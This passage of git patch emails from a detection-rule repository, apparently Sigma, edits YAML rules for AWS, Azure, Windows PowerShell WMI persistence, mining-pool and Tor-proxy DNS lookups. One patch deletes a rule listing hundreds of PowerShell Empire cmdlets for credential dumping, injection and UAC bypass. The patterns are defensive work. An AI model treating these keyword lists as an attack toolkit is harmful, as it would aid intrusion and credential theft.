S3 data management in Amazon Web Services. author: Austin Songer status: experimental date: 2021/07/24 +modified: 2021/08/19 references: - https://github.com/elastic/detection-rules/pull/1145/files - https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html @@ -16,7 +17,7 @@ logsource: service: cloudtrail detection: selection: - eventSource: iam.amazonaws.com + eventSource: s3.amazonaws.com eventName: - PutBucketLogging - PutBucketWebsite diff --git a/rules/cloud/aws/aws_snapshot_backup_exfiltration.yml b/rules/cloud/aws/aws_snapshot_backup_exfiltration.yml index 37814a8f..e8794cee 100644 --- a/rules/cloud/aws/aws_snapshot_backup_exfiltration.yml +++ b/rules/cloud/aws/aws_snapshot_backup_exfiltration.yml @@ -4,7 +4,7 @@ status: test description: Detects the modification of an EC2 snapshot's permissions to enable access from another account author: Darin Smith date: 2021/05/17 -modified: 2021/08/09 +modified: 2021/08/19 references: - https://www.justice.gov/file/1080281/download - https://attack.mitre.org/techniques/T1537/ @@ -12,7 +12,7 @@ logsource: service: cloudtrail detection: selection_source: - eventSource: cloudtrail.amazonaws.com + eventSource: ec2.amazonaws.com eventName: ModifySnapshotAttribute condition: selection_source falsepositives: From 1266a66a8d5cb6ea745e672de6a5f8965b8571ce Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 19 Aug 2021 15:37:28 +0200 Subject: [PATCH 0448/1367] add powershell_wmi_persistence.yml --- .../powershell/powershell_wmi_persistence.yml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 rules/windows/powershell/powershell_wmi_persistence.yml diff --git a/rules/windows/powershell/powershell_wmi_persistence.yml b/rules/windows/powershell/powershell_wmi_persistence.yml new file mode 100644 index 00000000..c5a43e78 --- /dev/null +++ b/rules/windows/powershell/powershell_wmi_persistence.yml @@ -0,0 +1,34 @@ +title: Powershell WMI persistence +id: 9e07f6e7-83aa-45c6-998e-0af26efd0a85 +status: experimental +author: frack113 +date: 2021/08/19 +description: Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md + - https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 +tags: + - attack.privilege_escalation + - attack.t1546.003 +logsource: + product: windows + service: powershell + definition: EnableScriptBlockLogging must be set to enable +detection: + selection_id: + EventID: 4104 + selection_ioc: + - ScriptBlockText|contains|all: + - 'New-CimInstance ' + - '-Namespace root/subscription ' + - '-ClassName __EventFilter + - '-Property ' #is a variable name + - ScriptBlockText|contains|all: + - 'New-CimInstance ' + - '-Namespace root/subscription ' + - '-ClassName CommandLineEventConsumer ' + - '-Property ' #is a variable name + condition: all all them +falsepositives: + - Unknown +level: medium \ No newline at end of file From 89b6e1108ba3abe67396b5d1b6d2de13ee8578e2 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 19 Aug 2021 15:42:19 +0200 Subject: [PATCH 0449/1367] powershell_wmi_persistence fix errors --- rules/windows/powershell/powershell_wmi_persistence.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/powershell/powershell_wmi_persistence.yml b/rules/windows/powershell/powershell_wmi_persistence.yml index c5a43e78..90559541 100644 --- a/rules/windows/powershell/powershell_wmi_persistence.yml +++ b/rules/windows/powershell/powershell_wmi_persistence.yml @@ -21,14 +21,14 @@ detection: - ScriptBlockText|contains|all: - 'New-CimInstance ' - '-Namespace root/subscription ' - - '-ClassName __EventFilter + - '-ClassName __EventFilter ' - '-Property ' #is a variable name - ScriptBlockText|contains|all: - 'New-CimInstance ' - '-Namespace root/subscription ' - '-ClassName CommandLineEventConsumer ' - '-Property ' #is a variable name - condition: all all them + condition: all of them falsepositives: - Unknown level: medium \ No newline at end of file From cc51e054e33422f44dbbce17edee9591a3b16322 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 19 Aug 2021 09:04:22 -0500 Subject: [PATCH 0450/1367] Update azure_keyvault_secrets_modified_or_deleted.yml --- rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml b/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml index d8a15e15..f4f146af 100644 --- a/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml @@ -11,6 +11,7 @@ logsource: detection: selection: properties.message: + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/WRITE - MICROSOFT.KEYVAULT/VAULTS/SECRETS/DELETE - MICROSOFT.KEYVAULT/VAULTS/SECRETS/BACKUP/ACTION - MICROSOFT.KEYVAULT/VAULTS/SECRETS/PURGE/ACTION From 90c9c08743271bc8bd71b0a7872d4c71c1dc17c6 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 19 Aug 2021 16:09:31 +0200 Subject: [PATCH 0451/1367] fix title --- rules/windows/powershell/powershell_wmi_persistence.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_wmi_persistence.yml b/rules/windows/powershell/powershell_wmi_persistence.yml index 90559541..514bf453 100644 --- a/rules/windows/powershell/powershell_wmi_persistence.yml +++ b/rules/windows/powershell/powershell_wmi_persistence.yml @@ -1,4 +1,4 @@ -title: Powershell WMI persistence +title: Powershell WMI Persistence id: 9e07f6e7-83aa-45c6-998e-0af26efd0a85 status: experimental author: frack113 From f1a84536c3bbf95ae420cad12cbe2ae98fe6a554 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 19 Aug 2021 17:55:41 +0200 Subject: [PATCH 0452/1367] update fix --- rules/network/zeek/zeek_dns_mining_pools.yml | 103 +++++++++++++----- rules/network/zeek/zeek_dns_torproxy.yml | 39 ++++++- .../builtin/win_anomaly_process_execution.yml | 8 +- .../windows/builtin/win_event_log_cleared.yml | 2 +- 4 files changed, 115 insertions(+), 37 deletions(-) diff --git a/rules/network/zeek/zeek_dns_mining_pools.yml b/rules/network/zeek/zeek_dns_mining_pools.yml index c6b4cde5..8adfe85d 100644 --- a/rules/network/zeek/zeek_dns_mining_pools.yml +++ b/rules/network/zeek/zeek_dns_mining_pools.yml @@ -2,9 +2,9 @@ title: DNS Events Related To Mining Pools id: bf74135c-18e8-4a72-a926-0e4f47888c19 description: Identifies IPs that may be performing DNS lookups associated with common currency mining pools. references: - - Azure Sentinel -date: 2021/08/15 -author: Saw Winn Naung + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/ASimDNS/imDNS_Miners.yaml +date: 2021/08/19 +author: Saw Winn Naung , Azure-Sentinel level: medium logsource: service: dns @@ -15,30 +15,79 @@ tags: detection: selection: query: - - 'monerohash.com' - - 'do-dear.com' - - 'xmrminerpro.com' - - 'secumine.net' - - 'xmrpool.com' - - 'minexmr.org' - - 'hashanywhere.com' - - 'xmrget.com' - - 'mininglottery.eu' - - 'minergate.com' - - 'moriaxmr.com' - - 'multipooler.com' - - 'moneropools.com' - - 'xmrpool.eu' - - 'coolmining.club' - - 'supportxmr.com' - - 'minexmr.com' - - 'coinfoundry.org' - - 'cryptoknight.cc' - - 'fairhash.org' - - 'baikalmine.com' - - 'tubepool.xyz' - - 'fairpool.xyz' - - 'asiapool.io' + - "monerohash.com" + - "do-dear.com" + - "xmrminerpro.com" + - "secumine.net" + - "xmrpool.com" + - "minexmr.org" + - "hashanywhere.com" + - "xmrget.com" + - "mininglottery.eu" + - "minergate.com" + - "moriaxmr.com" + - "multipooler.com" + - "moneropools.com" + - "xmrpool.eu" + - "coolmining.club" + - "supportxmr.com" + - "minexmr.com" + - "hashvault.pro" + - "xmrpool.net" + - "crypto-pool.fr" + - "xmr.pt" + - "miner.rocks" + - "walpool.com" + - "herominers.com" + - "gntl.co.uk" + - "semipool.com" + - "coinfoundry.org" + - "cryptoknight.cc" + - "fairhash.org" + - "baikalmine.com" + - "tubepool.xyz" + - "fairpool.xyz" + - "asiapool.io" + - "coinpoolit.webhop.me" + - "nanopool.org" + - "moneropool.com" + - "miner.center" + - "prohash.net" + - "poolto.be" + - "cryptoescrow.eu" + - "monerominers.net" + - "cryptonotepool.org" + - "extrmepool.org" + - "webcoin.me" + - "kippo.eu" + - "hashinvest.ws" + - "monero.farm" + - "supportxmr.com" + - "xmrpool.eu" + - "linux-repository-updates.com" + - "1gh.com" + - "dwarfpool.com" + - "hash-to-coins.com" + - "hashvault.pro" + - "pool-proxy.com" + - "hashfor.cash" + - "fairpool.cloud" + - "litecoinpool.org" + - "mineshaft.ml" + - "abcxyz.stream" + - "moneropool.ru" + - "cryptonotepool.org.uk" + - "extremepool.org" + - "extremehash.com" + - "hashinvest.net" + - "unipool.pro" + - "crypto-pools.org" + - "monero.net" + - "backup-pool.com" + - "mooo.com" + - "freeyy.me" + - "cryptonight.net" + - "shscrypto.net" condition: selection fields: - clientip diff --git a/rules/network/zeek/zeek_dns_torproxy.yml b/rules/network/zeek/zeek_dns_torproxy.yml index b3f89c18..e073a15e 100644 --- a/rules/network/zeek/zeek_dns_torproxy.yml +++ b/rules/network/zeek/zeek_dns_torproxy.yml @@ -2,9 +2,9 @@ title: DNS TOR Proxies id: a8322756-015c-42e7-afb1-436e85ed3ff5 description: Identifies IPs performing DNS lookups associated with common Tor proxies. references: - - Azure Sentinel + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/ASimDNS/imDNS_TorProxies.yaml date: 2021/08/15 -author: Saw Winn Naung +author: Saw Winn Naung , Azure-Sentinel level: medium logsource: service: dns @@ -14,9 +14,38 @@ tags: detection: selection: query: - - 'tor2web.*' - - 'onion.*' - - '*tor-gateways*' + - "tor2web.org" + - "tor2web.com" + - "torlink.co" + - "onion.to" + - "onion.ink" + - "onion.cab" + - "onion.nu" + - "onion.link" + - "onion.it" + - "onion.city" + - "onion.direct" + - "onion.top" + - "onion.casa" + - "onion.plus" + - "onion.rip" + - "onion.dog" + - "tor2web.fi" + - "tor2web.blutmagie.de" + - "onion.sh" + - "onion.lu" + - "onion.pet" + - "t2w.pw" + - "tor2web.ae.org" + - "tor2web.io" + - "tor2web.xyz" + - "onion.lt" + - "s1.tor-gateways.de" + - "s2.tor-gateways.de" + - "s3.tor-gateways.de" + - "s4.tor-gateways.de" + - "s5.tor-gateways.de" + - "hiddenservice.net" condition: selection fields: - clientip diff --git a/rules/windows/builtin/win_anomaly_process_execution.yml b/rules/windows/builtin/win_anomaly_process_execution.yml index c49f18c2..163af479 100644 --- a/rules/windows/builtin/win_anomaly_process_execution.yml +++ b/rules/windows/builtin/win_anomaly_process_execution.yml @@ -3,15 +3,15 @@ id: 2c55fe7a-b06f-4029-a5b9-c54a2320d7b8 description: 'Identifies anomalous executions of sensitive processes which are often leveraged as attack vectors.' author: sawwinnnaung references: - - Azure Sentinel + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/TimeSeriesAnomaly-ProcessExecutions.yaml date: 2021/08/15 level: medium -logsource: - product: windows - category: process_creation tags: - attack.execution - attack.t1064 +logsource: + product: windows + category: process_creation detection: selection: NewProcessName|contains: diff --git a/rules/windows/builtin/win_event_log_cleared.yml b/rules/windows/builtin/win_event_log_cleared.yml index f8c56070..e3a88f08 100644 --- a/rules/windows/builtin/win_event_log_cleared.yml +++ b/rules/windows/builtin/win_event_log_cleared.yml @@ -3,7 +3,7 @@ id: a122ac13-daf8-4175-83a2-72c387be339d status: experimental description: Checks for event id 1102 which indicates the security event log was cleared. references: - - Azure Sentinel + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/SecurityEventLogCleared.yaml date: 2021/08/15 author: Saw Winn Naung level: medium From 3283664154cc1cccd63cd9e40cdf2cac9d0616a2 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 19 Aug 2021 18:28:44 +0200 Subject: [PATCH 0453/1367] Update remove useless rules --- rules/network/zeek/zeek_dns_mining_pools.yml | 3 - .../builtin/win_anomaly_process_execution.yml | 24 -- .../builtin/win_powershelll_empire.yml | 309 ------------------ 3 files changed, 336 deletions(-) delete mode 100644 rules/windows/builtin/win_anomaly_process_execution.yml delete mode 100644 rules/windows/builtin/win_powershelll_empire.yml diff --git a/rules/network/zeek/zeek_dns_mining_pools.yml b/rules/network/zeek/zeek_dns_mining_pools.yml index 8adfe85d..71003888 100644 --- a/rules/network/zeek/zeek_dns_mining_pools.yml +++ b/rules/network/zeek/zeek_dns_mining_pools.yml @@ -62,13 +62,10 @@ detection: - "kippo.eu" - "hashinvest.ws" - "monero.farm" - - "supportxmr.com" - - "xmrpool.eu" - "linux-repository-updates.com" - "1gh.com" - "dwarfpool.com" - "hash-to-coins.com" - - "hashvault.pro" - "pool-proxy.com" - "hashfor.cash" - "fairpool.cloud" diff --git a/rules/windows/builtin/win_anomaly_process_execution.yml b/rules/windows/builtin/win_anomaly_process_execution.yml deleted file mode 100644 index 163af479..00000000 --- a/rules/windows/builtin/win_anomaly_process_execution.yml +++ /dev/null @@ -1,24 +0,0 @@ -title: Process Execution Anomaly -id: 2c55fe7a-b06f-4029-a5b9-c54a2320d7b8 -description: 'Identifies anomalous executions of sensitive processes which are often leveraged as attack vectors.' -author: sawwinnnaung -references: - - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/TimeSeriesAnomaly-ProcessExecutions.yaml -date: 2021/08/15 -level: medium -tags: - - attack.execution - - attack.t1064 -logsource: - product: windows - category: process_creation -detection: - selection: - NewProcessName|contains: - - 'powershell.exe' - - 'cmd.exe' - - 'wmic.exe' - - 'psexec.exe' - - 'cacls.exe' - - 'rundll.exe' - condition: selection diff --git a/rules/windows/builtin/win_powershelll_empire.yml b/rules/windows/builtin/win_powershelll_empire.yml deleted file mode 100644 index a765f45d..00000000 --- a/rules/windows/builtin/win_powershelll_empire.yml +++ /dev/null @@ -1,309 +0,0 @@ -title: Powershell Empire Cmdlets Seen In Command Line -id: ef88eb96-861c-43a0-ab16-f3835a97c928 -description: Identifies instances of PowerShell Empire cmdlets in powershell process command line data. -author: sawwinnnaung -references: - - Azure Sentinel -date: 2021/08/15 -level: medium -logsource: - product: windows - category: process_creation -tags: - - attack.execution - - attack.persistence - - attack.t1208 -detection: - selection1: - CommandLine|contains: ' -encodedCommand' - selection2: - CommandLine: - - 'SetDelay' - - 'GetDelay' - - 'Set-LostLimit' - - 'Get-LostLimit' - - 'Set-Killdate' - - 'Get-Killdate' - - 'Set-WorkingHours' - - 'Get-WorkingHours' - - 'Get-Sysinfo' - - 'Add-Servers' - - 'Invoke-ShellCommand' - - 'Start-AgentJob' - - 'Update-Profile' - - 'Get-FilePart' - - 'Encrypt-Bytes' - - 'Decrypt-Bytes' - - 'Encode-Packet' - - 'Decode-Packet' - - 'Send-Message' - - 'Process-Packet' - - 'Process-Tasking' - - 'Get-Task' - - 'Start-Negotiate' - - 'Invoke-DllInjection' - - 'Invoke-ReflectivePEInjection' - - 'Invoke-Shellcode' - - 'Invoke-ShellcodeMSIL' - - 'Get-ChromeDump' - - 'Get-ClipboardContents' - - 'Get-IndexedItem' - - 'Get-Keystrokes' - - 'Invoke-Inveigh' - - 'Invoke-NetRipper' - - 'local:Invoke-PatchDll' - - 'Invoke-NinjaCopy' - - 'Get-Win32Types' - - 'Get-Win32Constants' - - 'Get-Win32Functions' - - 'Sub-SignedIntAsUnsigned' - - 'Add-SignedIntAsUnsigned' - - 'Compare-Val1GreaterThanVal2AsUInt' - - 'Convert-UIntToInt' - - 'Test-MemoryRangeValid' - - 'Write-BytesToMemory' - - 'Get-DelegateType' - - 'Get-ProcAddress' - - 'Enable-SeDebugPrivilege' - - 'Invoke-CreateRemoteThread' - - 'Get-ImageNtHeaders' - - 'Get-PEBasicInfo' - - 'Get-PEDetailedInfo' - - 'Import-DllInRemoteProcess' - - 'Get-RemoteProcAddress' - - 'Copy-Sections' - - 'Update-MemoryAddresses' - - 'Import-DllImports' - - 'Get-VirtualProtectValue' - - 'Update-MemoryProtectionFlags' - - 'Update-ExeFunctions' - - 'Copy-ArrayOfMemAddresses' - - 'Get-MemoryProcAddress' - - 'Invoke-MemoryLoadLibrary' - - 'Invoke-MemoryFreeLibrary' - - 'Out-Minidump' - - 'Get-VaultCredential' - - 'Invoke-DCSync' - - 'Translate-Name' - - 'Get-NetDomain' - - 'Get-NetForest' - - 'Get-NetForestDomain' - - 'Get-DomainSearcher' - - 'Get-NetComputer' - - 'Get-NetGroupMember' - - 'Get-NetUser' - - 'Invoke-Mimikatz' - - 'Invoke-PowerDump' - - 'Invoke-TokenManipulation' - - 'Exploit-JMXConsole' - - 'Exploit-JBoss' - - 'Invoke-Thunderstruck' - - 'Invoke-VoiceTroll' - - 'Set-WallPaper' - - 'Invoke-PsExec' - - 'Invoke-SSHCommand' - - 'Invoke-PSInject' - - 'Invoke-RunAs' - - 'Invoke-SendMail' - - 'Invoke-Rule' - - 'Get-OSVersion' - - 'Select-EmailItem' - - 'View-Email' - - 'Get-OutlookFolder' - - 'Get-EmailItems' - - 'Invoke-MailSearch' - - 'Get-SubFolders' - - 'Get-GlobalAddressList' - - 'Invoke-SearchGAL' - - 'Get-SMTPAddress' - - 'Disable-SecuritySettings' - - 'Reset-SecuritySettings' - - 'Get-OutlookInstance' - - 'New-HoneyHash' - - 'Set-MacAttribute' - - 'Invoke-PatchDll' - - 'Get-SecurityPackages' - - 'Install-SSP' - - 'Invoke-BackdoorLNK' - - 'New-ElevatedPersistenceOption' - - 'New-UserPersistenceOption' - - 'Add-Persistence' - - 'Invoke-CallbackIEX' - - 'Add-PSFirewallRules' - - 'Invoke-EventLoop' - - 'Invoke-PortBind' - - 'Invoke-DNSLoop' - - 'Invoke-PacketKnock' - - 'Invoke-CallbackLoop' - - 'Invoke-BypassUAC' - - 'Get-DecryptedCpassword' - - 'Get-GPPInnerFields' - - 'Invoke-WScriptBypassUAC' - - 'Get-ModifiableFile' - - 'Get-ServiceUnquoted' - - 'Get-ServiceFilePermission' - - 'Get-ServicePermission' - - 'Invoke-ServiceUserAdd' - - 'Invoke-ServiceCMD' - - 'Write-UserAddServiceBinary' - - 'Write-CMDServiceBinary' - - 'Write-ServiceEXE' - - 'Write-ServiceEXECMD' - - 'Restore-ServiceEXE' - - 'Invoke-ServiceStart' - - 'Invoke-ServiceStop' - - 'Invoke-ServiceEnable' - - 'Invoke-ServiceDisable' - - 'Get-ServiceDetail' - - 'Find-DLLHijack' - - 'Find-PathHijack' - - 'Write-HijackDll' - - 'Get-RegAlwaysInstallElevated' - - 'Get-RegAutoLogon' - - 'Get-VulnAutoRun' - - 'Get-VulnSchTask' - - 'Get-UnattendedInstallFile' - - 'Get-Webconfig' - - 'Get-ApplicationHost' - - 'Write-UserAddMSI' - - 'Invoke-AllChecks' - - 'Invoke-ThreadedFunction' - - 'Test-Login' - - 'Get-UserAgent' - - 'Test-Password' - - 'Get-ComputerDetails' - - 'Find-4648Logons' - - 'Find-4624Logons' - - 'Find-AppLockerLogs' - - 'Find-PSScriptsInPSAppLog' - - 'Find-RDPClientConnections' - - 'Get-SystemDNSServer' - - 'Invoke-Paranoia' - - 'Invoke-WinEnum{' - - 'Get-SPN' - - 'Invoke-ARPScan' - - 'Invoke-Portscan' - - 'Invoke-ReverseDNSLookup' - - 'Invoke-SMBScanner' - - 'New-InMemoryModule' - - 'Add-Win32Type' - - 'Export-PowerViewCSV' - - 'Get-MacAttribute' - - 'Copy-ClonedFile' - - 'Get-IPAddress' - - 'Convert-NameToSid' - - 'Convert-SidToName' - - 'Convert-NT4toCanonical' - - 'Get-Proxy' - - 'Get-PathAcl' - - 'Get-NameField' - - 'Convert-LDAPProperty' - - 'Get-NetDomainController' - - 'Add-NetUser' - - 'Add-NetGroupUser' - - 'Get-UserProperty' - - 'Find-UserField' - - 'Get-UserEvent' - - 'Get-ObjectAcl' - - 'Add-ObjectAcl' - - 'Invoke-ACLScanner' - - 'Get-GUIDMap' - - 'Get-ADObject' - - 'Set-ADObject' - - 'Get-ComputerProperty' - - 'Find-ComputerField' - - 'Get-NetOU' - - 'Get-NetSite' - - 'Get-NetSubnet' - - 'Get-DomainSID' - - 'Get-NetGroup' - - 'Get-NetFileServer' - - 'SplitPath' - - 'Get-DFSshare' - - 'Get-DFSshareV1' - - 'Get-DFSshareV2' - - 'Get-GptTmpl' - - 'Get-GroupsXML' - - 'Get-NetGPO' - - 'Get-NetGPOGroup' - - 'Find-GPOLocation' - - 'Get-DomainPolicy' - - 'Get-NetLocalGroup' - - 'Get-NetShare' - - 'Get-NetLoggedon' - - 'Get-NetSession' - - 'Get-NetRDPSession' - - 'Invoke-CheckLocalAdminAccess' - - 'Get-LastLoggedOn' - - 'Get-NetProcess' - - 'Find-InterestingFile' - - 'Invoke-CheckWrite' - - 'Invoke-UserHunter' - - 'Invoke-StealthUserHunter' - - 'Invoke-ProcessHunter' - - 'Invoke-EventHunter' - - 'Invoke-ShareFinder' - - 'Invoke-FileFinder' - - 'Find-LocalAdminAccess' - - 'Get-ExploitableSystem' - - 'Invoke-EnumerateLocalAdmin' - - 'Get-NetDomainTrust' - - 'Get-NetForestTrust' - - 'Find-ForeignUser' - - 'Find-ForeignGroup' - - 'Invoke-MapDomainTrust' - - 'Get-Hex' - - 'Create-RemoteThread' - - 'Get-FoxDump' - - 'Decrypt-CipherText' - - 'Get-Screenshot' - - 'Start-HTTP-Server' - - 'Local:Invoke-CreateRemoteThread' - - 'Local:Get-Win32Functions' - - 'Local:Inject-NetRipper' - - 'GetCommandLine' - - 'ElevatePrivs' - - 'Get-RegKeyClass' - - 'Get-BootKey' - - 'Get-HBootKey' - - 'Get-UserName' - - 'Get-UserHashes' - - 'DecryptHashes' - - 'DecryptSingleHash' - - 'Get-UserKeys' - - 'DumpHashes' - - 'Enable-SeAssignPrimaryTokenPrivilege' - - 'Enable-Privilege' - - 'Set-DesktopACLs' - - 'Set-DesktopACLToAllowEveryone' - - 'Get-PrimaryToken' - - 'Get-ThreadToken' - - 'Get-TokenInformation' - - 'Get-UniqueTokens' - - 'Find-GPOComputerAdmin' - - 'Invoke-ImpersonateUser' - - 'Create-ProcessWithToken' - - 'Free-AllTokens' - - 'Enum-AllTokens' - - 'Invoke-RevertToSelf' - - 'Set-Speaker(\$Volume){\$wshShell' - - 'Local:Get-RandomString' - - 'Local:Invoke-PsExecCmd' - - 'Get-GPPPassword' - - 'Local:Inject-BypassStuff' - - 'Local:Invoke-CopyFile\(\$sSource,' - - 'ind-Fruit' - - 'New-IPv4Range' - - 'New-IPv4RangeFromCIDR' - - 'Parse-Hosts' - - 'Parse-ILHosts' - - 'Exclude-Hosts' - - 'Get-TopPort' - - 'Parse-Ports' - - 'Parse-IpPorts' - - 'Remove-Ports' - - 'Write-PortscanOut' - - 'Convert-SwitchtoBool' - - 'Get-ForeignUser' - - 'Get-ForeignGroup' - condition: selection1 or selection2 \ No newline at end of file From 23ad8cd14e9d0b71c1a1e45c0fb2f7c0538df534 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 19 Aug 2021 18:30:32 +0200 Subject: [PATCH 0454/1367] remove bad rules --- .../builtin/win_user_acc_added_removed.yml | 28 ------------------- .../builtin/win_user_acc_enabled_disabled.yml | 22 --------------- ...in_user_created_added_to_bultin_admins.yml | 23 --------------- 3 files changed, 73 deletions(-) delete mode 100644 rules/windows/builtin/win_user_acc_added_removed.yml delete mode 100644 rules/windows/builtin/win_user_acc_enabled_disabled.yml delete mode 100644 rules/windows/builtin/win_user_created_added_to_bultin_admins.yml diff --git a/rules/windows/builtin/win_user_acc_added_removed.yml b/rules/windows/builtin/win_user_acc_added_removed.yml deleted file mode 100644 index 8e083b64..00000000 --- a/rules/windows/builtin/win_user_acc_added_removed.yml +++ /dev/null @@ -1,28 +0,0 @@ -title: Account Added And Removed From Privileged Groups -id: 7efc75ce-e2a4-400f-a8b1-283d3b0f2c60 -description: Identifies accounts that are added to privileged group and then quickly removed, which could be a sign of compromise. -author: sawwinnnaung -references: - - Azure Sentinel -date: 2021/08/15 -level: low -logsource: - service: Security - product: windows -tags: - - attack.persistence - - attack.privilege_escalation - - attack.t1098 - - attack.t1078 -detection: - selection1: - EventID: - - 4728 - - 4732 - - 4756 - selection2: - EventID: - - 4729 - - 4733 - - 4757 - condition: selection1 or selection2 diff --git a/rules/windows/builtin/win_user_acc_enabled_disabled.yml b/rules/windows/builtin/win_user_acc_enabled_disabled.yml deleted file mode 100644 index 920efc48..00000000 --- a/rules/windows/builtin/win_user_acc_enabled_disabled.yml +++ /dev/null @@ -1,22 +0,0 @@ -title: User Account Enabled And Disabled -id: 3d023f64-8225-41a2-9570-2bd7c2c4535e -description: Identifies when a user account is enabled and then disabled. This can be an indication of compromise and an adversary attempting to hide in the noise. -author: sawwinnnaung -references: - - Azure Sentinel -date: 2021/08/15 -level: medium -logsource: - service: Security - product: windows -tags: - - attack.persistence - - attack.privilege_escalation - - attack.t1098 - - attack.t1078 -detection: - selection: - EventID: - - 4722 - - 4725 - condition: selection diff --git a/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml b/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml deleted file mode 100644 index 57bb606c..00000000 --- a/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml +++ /dev/null @@ -1,23 +0,0 @@ -title: New Uer Created And Added To The Built-in Administrators Group -id: aa1eff90-29d4-49dc-a3ea-b65199f516db -description: Identifies when a user account was created and then added to the builtin Administrators group. This should be monitored closely and all additions reviewed. -author: sawwinnnaung -references: - - Azure Sentinel -date: 2021/08/15 -level: low -logsource: - service: Security - product: windows -tags: - - attack.persistence - - attack.privilege_escalation -relevantTechniques: - - attack.t1098 - - attack.t1078 -detection: - selection: - EventID: - - 4720 - - 4732 - condition: selection \ No newline at end of file From 9a83836070b71349858d6bf05541d81e120eb9b2 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 19 Aug 2021 21:00:36 -0500 Subject: [PATCH 0455/1367] Update aws_eks_cluster_created_or_deleted.yml --- rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml index 342d5744..a5885858 100644 --- a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml +++ b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml @@ -1,7 +1,7 @@ title: AWS EKS Cluster Created or Deleted id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 description: Identifies when an EKS cluster is created or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/16 references: From 842ade16be5a553acdb95b7f466a2b28d8ba5ca2 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 20 Aug 2021 02:09:31 +0000 Subject: [PATCH 0456/1367] Forgot to add my username to some of the rules. --- rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml | 2 +- rules/cloud/aws/aws_elasticache_security_group_created.yml | 2 +- .../aws_elasticache_security_group_modified_or_deleted.yml | 2 +- .../aws/aws_route_53_domain_transferred_lock_disabled.yml | 2 +- .../aws_route_53_domain_transferred_to_another_account.yml | 2 +- rules/cloud/aws/aws_s3_data_management_tampering.yml | 2 +- rules/cloud/aws/aws_sts_assumedrole_misuse.yml | 2 +- rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml | 2 +- .../azure/azure_container_registry_created_or_deleted.yml | 2 +- rules/cloud/azure/azure_firewall_modified_or_deleted.yml | 2 +- .../azure_firewall_rule_collection_modified_or_deleted.yml | 2 +- rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml | 2 +- rules/cloud/azure/azure_keyvault_modified_or_deleted.yml | 2 +- .../azure/azure_keyvault_secrets_modified_or_deleted.yml | 2 +- .../azure/azure_kubernetes_cluster_created_or_deleted.yml | 2 +- rules/cloud/azure/azure_kubernetes_events_deleted.yml | 2 +- rules/cloud/azure/azure_kubernetes_pods_deleted.yml | 4 ++-- rules/cloud/azure/azure_kubernetes_role_access.yml | 2 +- .../azure_kubernetes_rolebinding_modified_or_deleted.yml | 2 +- .../azure_kubernetes_service_account_modified_or_deleted.yml | 2 +- .../azure/azure_network_firewall_rule_modified_or_deleted.yml | 2 +- .../cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml | 2 +- .../azure_network_virtual_device_modified_or_deleted.yml | 2 +- rules/cloud/gcp/gcp_bucket_enumeration.yml | 2 +- rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml | 2 +- rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml | 2 +- rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml | 2 +- rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml | 2 +- rules/cloud/gcp/gcp_service_account_modified.yml | 2 +- rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml | 2 +- rules/cloud/m365/microsoft365_impossible_travel_activity.yml | 2 +- 31 files changed, 32 insertions(+), 32 deletions(-) diff --git a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml index 342d5744..a5885858 100644 --- a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml +++ b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml @@ -1,7 +1,7 @@ title: AWS EKS Cluster Created or Deleted id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 description: Identifies when an EKS cluster is created or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/16 references: diff --git 